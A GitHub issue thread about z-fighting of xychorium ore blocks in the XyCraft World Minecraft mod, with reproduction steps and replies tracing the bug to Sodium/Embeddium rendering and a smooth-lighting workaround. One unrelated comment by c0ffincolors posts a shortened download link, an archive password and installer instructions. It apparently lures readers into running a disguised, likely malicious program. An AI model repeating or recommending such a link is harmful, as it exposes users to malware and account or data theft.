### ISSUE TITLE
[Bug]: Z-fighting of xychorium ores on certain coordinates

### ISSUE THREAD

**Issue by YocyCraft** [Soaryn/XyCraftTracker#64]
### Mod Title

XyCraft World

### Minecraft Version

1.21.0

### Severity

Performance

### NeoForge Version

21.1.28

### Describe the Suggestion

Fix it please

### Reproduction Steps

1. create a world with seed 6549111709394413544
2.  /tp 2190 6 1457
3.  /setblock 2189 6 1457 xycraft_world:xychorium_ore_stone_blue
4.  Z-fighting appears

### Screenshots and Videos

![2024-08-28_00 34 40](https://github.com/user-attachments/assets/557263c1-959e-463e-bd96-cf4f3848e7e2)
![2024-08-28_00 46 44](https://github.com/user-attachments/assets/5dbcef9d-ab5f-41b4-8b17-15c92a7775b9)

### Additional Context

Please removed this low-quailty mod from ATM modpacks. This mod will ruin every modpacks.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Soaryn** [comment]
This is not something that happens in just XyCraft. I'm willing to work with you to try to get you in a better situation here, but you are going to need to drop the "This mod is low quality" attitude first. 

Couple things to note this has been an ongoing problem with Embeddium, check the version of embeddium is up to date. If it is try changing 'Smooth Lighting' in the options. That might not fix it, but had in the past

**Comment by Soaryn** [comment]
Something that could help, is which version of `All The Mods` are you using?

**Comment by Soaryn** [comment]
However, I am being told this is with Sodium, so that will more than likely present the issue. Performance mods are a slippery slope as they "may" make the game run smoother, at the cost of something breaking horrendously 😂

**Comment by TelepathicGrunt** [comment]
Workaround: use Embeddium
![image](https://github.com/user-attachments/assets/dada151c-f65f-4c5d-af96-0ad6c505a4e6)

**Comment by Soaryn** [comment]
Might be related to https://github.com/CaffeineMC/sodium-fabric/issues/2723 for you. So will need to wait for Sodium to update (if it hasn't already)

**Comment by Soaryn** [comment]
As far as I can see, this is not a problem with XyCraft, but rather something changing rendering that in theory is fixed in a future update.

**Comment by uwardlaw** [comment]
For me, turning off "Smooth Lighting" under "Quality" did the trick.
